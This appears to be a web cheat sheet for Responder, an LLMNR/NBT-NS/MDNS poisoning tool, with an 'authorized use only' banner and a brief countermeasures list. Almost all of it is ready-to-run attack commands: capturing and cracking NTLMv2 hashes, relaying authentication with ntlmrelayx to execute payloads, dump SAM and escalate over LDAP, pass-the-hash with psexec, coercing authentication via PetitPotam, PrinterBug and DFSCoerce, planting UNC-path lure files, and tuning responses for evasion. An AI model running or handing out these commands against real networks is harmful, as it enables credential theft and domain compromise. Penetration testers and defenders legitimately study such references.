โ† All cheat sheets

RESPONDER

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Responder is a LLMNR, NBT-NS, and MDNS poisoner.
Captures credentials by responding to broadcast name resolution requests.

BASIC USAGE#

# Start Responder
sudo responder -I eth0

# With all options enabled
sudo responder -I eth0 -rdwv

# Analyze mode (passive, no poisoning)
sudo responder -I eth0 -A

COMMON OPTIONS#

-I INTERFACE      Network interface
-i IP             Local IP to use
-e IP             External IP for WPAD
-r                Enable LLMNR responses (default)
-d                Enable NBT-NS responses
-w                Start WPAD rogue proxy
-F                Force WPAD auth (HTML)
-P                Force proxy auth (Basic)
-v                Verbose mode
-A                Analyze mode (passive)
-f                Fingerprint hosts

PROTOCOL OPTIONS#

# Responder.conf controls which services to enable/disable
# /etc/responder/Responder.conf or /usr/share/responder/Responder.conf

# Services:
SQL = On/Off
SMB = On/Off
RDP = On/Off
Kerberos = On/Off
FTP = On/Off
POP = On/Off
SMTP = On/Off
IMAP = On/Off
HTTP = On/Off
HTTPS = On/Off
DNS = On/Off
LDAP = On/Off
DCERPC = On/Off
WINRM = On/Off

BASIC ATTACKS#


    

LLMNR/NBT-NS POISONING#

# Default poisoning
sudo responder -I eth0

# When victim tries to access \\server\share that doesn't exist:
# 1. DNS fails
# 2. LLMNR/NBT-NS broadcast query
# 3. Responder responds with attacker IP
# 4. Victim connects to attacker
# 5. Responder captures NTLMv2 hash

WPAD ATTACK#

# Enable WPAD proxy
sudo responder -I eth0 -wFv

# Captures hashes from:
# - Browsers configured for auto proxy detection
# - Windows services checking WPAD
# - Edge/IE with auto-detect enabled

SMB RELAY (Disabled by Default)#

# Disable SMB in Responder.conf for relay
# SMB = Off
# HTTP = Off

# Then use with ntlmrelayx
sudo responder -I eth0
# In another terminal:
ntlmrelayx.py -tf targets.txt -smb2support

DHCP POISONING#

# DHCP exhaustion + poisoning
sudo responder -I eth0 --dhcp

ANALYZE MODE#

# Passive fingerprinting (no poisoning)
sudo responder -I eth0 -A

# Identify:
# - Hosts making LLMNR/NBT-NS queries
# - Protocols in use
# - Potential targets

CAPTURED HASHES#


    

HASH LOCATION#

# Hashes saved to:
/usr/share/responder/logs/
# or
~/.responder/logs/

# Files:
# - SMB-NTLMv2-SSP-IP.txt
# - HTTP-NTLMv2-IP.txt
# - Responder-Session.log

HASH FORMAT#

# NTLMv2 format:
username::domain:ServerChallenge:NTProofStr:NTLMv2Response

# Example:
admin::DOMAIN:1122334455667788:aabbccdd...:0101000000000000...

CRACKING HASHES#

# Hashcat
hashcat -m 5600 hashes.txt wordlist.txt

# John the Ripper
john --format=netntlmv2 hashes.txt

NTLM RELAY ATTACKS#


    

SETUP FOR RELAY#

# 1. Disable SMB and HTTP in Responder.conf
[Responder Core]
SMB = Off
HTTP = Off

# 2. Start Responder
sudo responder -I eth0 -rv

# 3. Start ntlmrelayx
ntlmrelayx.py -tf targets.txt -smb2support

# 4. Wait for connections

RELAY TARGETS#

# targets.txt format:
192.168.1.10
192.168.1.20
smb://192.168.1.30
ldap://192.168.1.1

RELAY OPTIONS#

# Execute command
ntlmrelayx.py -tf targets.txt -c "whoami"

# Execute payload
ntlmrelayx.py -tf targets.txt -e payload.exe

# SAM dump
ntlmrelayx.py -tf targets.txt --dump-sam

# LDAP relay
ntlmrelayx.py -t ldap://DC -smb2support

# LDAP relay with escalation
ntlmrelayx.py -t ldap://DC --escalate-user attacker -smb2support

# SOCKS proxy
ntlmrelayx.py -tf targets.txt -socks -smb2support

ADVANCED ATTACKS#


    

MULTICAST DNS (MDNS)#

sudo responder -I eth0 -r

IPv6 ATTACKS#

# Use with mitm6
sudo mitm6 -d domain.local
# In another terminal:
ntlmrelayx.py -6 -t ldap://DC -wh wpad.domain.local

DHCP POISONING#

# Respond to DHCP requests with malicious settings
sudo responder -I eth0 --dhcp

MACHINE ACCOUNT ABUSE#

# Force authentication via various methods:
# - PetitPotam
# - PrinterBug
# - DFSCoerce
# Then relay to LDAP for RBCD attack

FORCING AUTHENTICATION#

Methods to coerce authentication:

# 1. Share access
# Create malicious file:
# shortcut.lnk -> \\attacker\share
# desktop.ini with IconFile=\\attacker\share

# 2. Office documents
# Include: \\attacker\share\image.png

# 3. PDF files
# Use pdf-parser to inject UNC paths

# 4. PetitPotam (MS-EFSRPC)
python3 PetitPotam.py -u user -p pass attacker_ip target_ip

# 5. PrinterBug (MS-RPRN)
python3 printerbug.py domain/user:password@target attacker_ip

# 6. DFSCoerce (MS-DFSNM)
python3 dfscoerce.py -u user -p pass -d domain.local attacker_ip target_ip

# 7. WebDAV
# Create malicious .searchConnector-ms or .library-ms files

EVASION#

# Limit responses
# Edit Responder.conf:
[Responder Core]
RespondTo = 192.168.1.0/24
DontRespondTo = 192.168.1.1

# Specific names only
RespondToName = WPAD,ISATAP

# Don't respond to certain hosts
DontRespondTo = 192.168.1.1,192.168.1.2

LOG ANALYSIS#

# View captured hashes
cat /usr/share/responder/logs/*NTLM*.txt

# View session log
cat /usr/share/responder/logs/Responder-Session.log

# Parse logs
grep -h "NTLMv2" /usr/share/responder/logs/*.txt | sort -u

# Extract usernames
cat /usr/share/responder/logs/*NTLM*.txt | cut -d: -f1 | sort -u

INTEGRATION WITH OTHER TOOLS#


    

WITH NTLMRELAYX#

sudo responder -I eth0 -rv
ntlmrelayx.py -tf targets.txt -smb2support

WITH MITM6#

sudo mitm6 -d domain.local
ntlmrelayx.py -6 -t ldap://DC -wh attacker.domain.local -l loot

WITH IMPACKET#

# Use captured hashes with Impacket tools
psexec.py domain/user@target -hashes :CAPTURED_HASH

WITH CRACKMAPEXEC#

nxc smb targets.txt -u user -H CAPTURED_HASH

COUNTERMEASURES#

- Disable LLMNR (GPO)
- Disable NBT-NS (NIC settings)
- Enable SMB signing
- Use network segmentation
- Monitor for Responder traffic
- Deploy honeypots

QUICK REFERENCE#

sudo responder -I eth0              # Basic poisoning
sudo responder -I eth0 -wFv         # With WPAD
sudo responder -I eth0 -A           # Analyze only
sudo responder -I eth0 -rv          # For relay (disable SMB in conf)
ntlmrelayx.py -tf targets.txt       # Relay captured auth
hashcat -m 5600 hash.txt wordlist   # Crack NTLMv2